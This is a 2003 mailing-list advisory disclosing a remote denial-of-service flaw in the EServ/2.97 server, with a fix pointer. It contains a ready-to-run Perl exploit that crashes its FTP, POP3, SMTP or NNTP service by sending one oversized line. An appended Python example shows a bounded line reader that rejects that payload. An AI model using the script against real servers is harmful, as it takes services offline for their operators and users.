[VulnWatch] EServ/2.97 remote DoS

From: D4rkGr3y (grey_1999@mail.ru)
Date: 01/04/03

    Date: Sat, 4 Jan 2003 05:01:41 -0800
    From: D4rkGr3y <grey_1999@mail.ru>
    To: bugtraq@securityfocus.com, submissions@packetstormsecurity.com, vulnwatch@vulnwatch.org
    
    

    #####################################################*
    # Damage Hacking Group security advisory
    # www.dhgroup.org
    #####################################################*
    #Product: EServ/2.97
    #Authors: Etype Co. [www.eserv.ru]
    #Vulnerable versions: up to v.2.97, possibly 2.98
    #Not vulnerable versions: v.2.99
    #Vulnerability: remote DoS
    #####################################################*

    #Overview#--------------------------------------------------------------#
    From EServ's 'readme' file:
    "Eserv/2.97 - mail, news, web, ftp and proxy server.
    It includes:

    - SMTP, POP3, NNTP -servers
    - caching HTTP/FTP proxy
    - HTTP server (maintaining virtual servers)
    - FTP server (with download and upload resuming support)
    - FTP-gate
    - Socks5, Socks4 and 4a proxy
    - TCP UDP mapping proxy
    - Finger-server"

    #Problem#---------------------------------------------------------------#
    We found 4 bugs that allow EServ to be killed by sending data of a
    very large size: FTP - 5005312 bytes, POP3 - 4950001 bytes, SMTP - 4960000
    bytes, NNTP - 5001216 bytes. This is not a buffer overflow, so it is
    impossible to use these bugs for privilege escalation or anything similar.

    #Fix#--------------------------------------------------------------------#
    Download the new version from www.eserv.ru. EServ/2.99 _is_not_vulnerable_.

    #Exploit#----------------------------------------------------------------#

    #!/usr/bin/perl
    ######################################################
    #EServ/2.97 remote DoS xsploit
    #Bugs found in v.2.97 but I think that 2.98 is
    #vulnerable too.
    #################
    #Usage: perl EServ.DoS.pl [host] [port] [service_type]
    #Where 'service_type' - service to attack (pop, smtp, ftp, nntp)
    #Example: perl EServ.DoS.pl localhost 110 pop
    #################
    #If something is wrong or you want to discuss something,
    #contact me: "D4rkGr3y" <grey_1999@mail.ru> icq: 540981
    #######################################################
    use strict;
    use warnings;
    use IO::Socket;

    my ($host, $port, $param) = @ARGV;
    my $data = "a";    # byte repeated to build the oversized line
    print "\n\n";
    print "#Product: EServ/2.97 - www.eserv.ru\n";
    print "#Vuln: remote DoS\n";
    print "#Xsploit by D4rkGr3y\n";
    print "#Warning: if you use a dial-up connection, the attack can take some time.\n\n";
    if ($param) {
        # Payload size in bytes that kills each service
        my $num;
        $num = 4950001 if $param eq "pop";
        $num = 4960000 if $param eq "smtp";
        $num = 5005312 if $param eq "ftp";
        $num = 5001215 if $param eq "nntp";
        die "Error in params\n" if !$num;
        print "Connecting...";
        my $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
            Proto => "tcp", Type => SOCK_STREAM) or die "Socket error.\n";
        print "OK\n";
        # One single line of $num bytes, terminated by a newline
        my $buf = $data x $num;
        print "Attacking...";
        print $socket "$buf\n";
        print "OK\n\n";
        print "Visit us at www.dhgroup.org";
        close($socket);
    } else {
        print "Error in Params.\n";
        print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n";
        print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n";
        print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n";
        exit;
    }

    #EOF

    Best regards www.dhgroup.org
      D4rkGr3y icq 540981
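As an added illustration (not part of the advisory and not EServ's code), the pattern a fixed server has to enforce: a command-line reader that drops the peer as soon as one line exceeds the service's ceiling, shown beside the naive readline() that buffers whatever the client chooses to send. The advisory does not say why a roughly 5 MB line kills EServ, so treating the root cause as unbounded line buffering is an assumption of this example. The per-protocol ceilings are also assumptions, taken from RFC 5321 (512 octets for an SMTP command line) and RFC 2449 (255 octets advised for POP3), with 4096 chosen arbitrarily for FTP and NNTP; the limits here count bytes before the line terminator. The payload sizes mirror the script above (whose NNTP constant, 5001215, is one less than the 5001216 in the text). The sample session bytes are constructed.

```python
import io

# Assumed per-service ceilings on a single command line (bytes before CRLF).
# SMTP: RFC 5321; POP3: RFC 2449 advice; FTP/NNTP: arbitrary but generous.
MAX_LINE = {"smtp": 512, "pop": 255, "ftp": 4096, "nntp": 4096}

# Payload sizes from the advisory's exploit script (NNTP as the script has it).
DOS_SIZES = {"pop": 4950001, "smtp": 4960000, "ftp": 5005312, "nntp": 5001215}


class LineTooLong(Exception):
    """A client sent a command line above the service ceiling."""


def naive_read_command_line(stream):
    """The pattern that invites this DoS: buffer until newline, no matter
    how many bytes that takes. Memory use is controlled by the peer."""
    return stream.readline()


def read_command_line(stream, max_len):
    """Read one command line from a byte stream, refusing once it exceeds
    max_len bytes. Reads a byte at a time so nothing past the offending
    byte is ever buffered; memory use is bounded by max_len, not by the peer.
    Raises EOFError if the stream ends with no partial line."""
    buf = bytearray()
    while True:
        b = stream.read(1)
        if not b:                                   # peer closed the connection
            if not buf:
                raise EOFError("connection closed")
            break
        if b == b"\n":
            break
        buf += b
        if len(buf) > max_len:
            raise LineTooLong(f"line exceeds {max_len} bytes")
    return bytes(buf).rstrip(b"\r")


def serve_stream(stream, service):
    """Consume commands as a hardened server would. Returns (accepted, dropped):
    the lines accepted and whether the peer was dropped for an oversized line."""
    limit = MAX_LINE[service]
    accepted = []
    while True:
        try:
            line = read_command_line(stream, limit)
        except EOFError:
            return accepted, False
        except LineTooLong:
            return accepted, True                   # close the connection, free the buffer
        accepted.append(line)


def serve_bytes(data, service):
    """Run serve_stream over an in-memory session; returns
    (accepted, dropped, bytes_consumed) so the consumption can be checked."""
    stream = io.BytesIO(data)
    accepted, dropped = serve_stream(stream, service)
    return accepted, dropped, stream.tell()


def naive_line_length(data):
    """How many bytes the naive reader ends up holding for the same input."""
    return len(naive_read_command_line(io.BytesIO(data)))


def build_dos_payload(service):
    """The single oversized line the advisory's script sends to each service."""
    return b"a" * DOS_SIZES[service] + b"\n"


if __name__ == "__main__":
    # Constructed sample session: a legitimate POP3 login is accepted in full.
    print(serve_bytes(b"USER alice\r\nPASS hunter2\r\n", "pop"))
    # The advisory's POP3 payload: dropped after 256 bytes, ~4.95 MB never read.
    payload = build_dos_payload("pop")
    print(serve_bytes(payload, "pop"))
    print(naive_line_length(payload))
```

The hardened reader rejects the POP3 payload after consuming 256 bytes, while the naive reader holds the whole 4950002-byte line; a line of exactly the ceiling still passes, one byte over is refused.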


